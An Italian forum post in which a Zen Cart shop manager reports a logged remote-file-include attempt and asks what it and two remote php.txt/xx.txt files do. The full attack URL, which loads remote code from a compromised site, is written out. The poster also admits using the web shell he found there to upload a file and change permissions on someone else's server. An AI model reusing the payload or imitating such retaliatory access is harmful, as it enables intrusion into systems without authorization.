su un negozio che ho in gestione che utilizza zen cart, tramite il pannello di amministrazione ho notato questo ip 201.130.79.84 che eseguiva questa query
Ha tentato un include dinamico?http://www.miosito.it/shop/index.php...autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.shearmanmitchell.com//design/components/com_logout/php.txt?
Sull'host per fortuna sono bloccati gli include esterni...
Poi sono andato sul sito http://www.shearmanmitchell.com/ nel quale c'è un redirect sul nuovo sito del poraccio a cui hanno craccato il sito....
Cmq sono rimasto abbastanza abbastanza stupefatto una volta andato alla pagina http://www.shearmanmitchell.com/design/components/.... c'era una pagina php dalla quale poter eseguire comandi da Shell... un programmino scritto in php ben fatto dal quale potevi eseguire qualsiasi comando...
Da casa, non avendo ip statico sono ritoernato su queesta pagina e gli ho uplodato un file con scritto quanto l'odiavo e gli ho chmoddato la pagina così non può vederla (ma dubito non riesca a recuperarla...)
Ora vorrei fare alcune domande:
La query che ho citato sopra, era include dinamico? Praticamente usa quel sito cracckato come base per sferrare attacchi ad altri siti? voleva defacciare la mia homepage?
Poi questi due file cosa fanno esattamente?
http://www.shearmanmitchell.com/desi...logout/php.txt
http://www.shearmanmitchell.com/desi..._logout/xx.txt ??
Rispondi quotando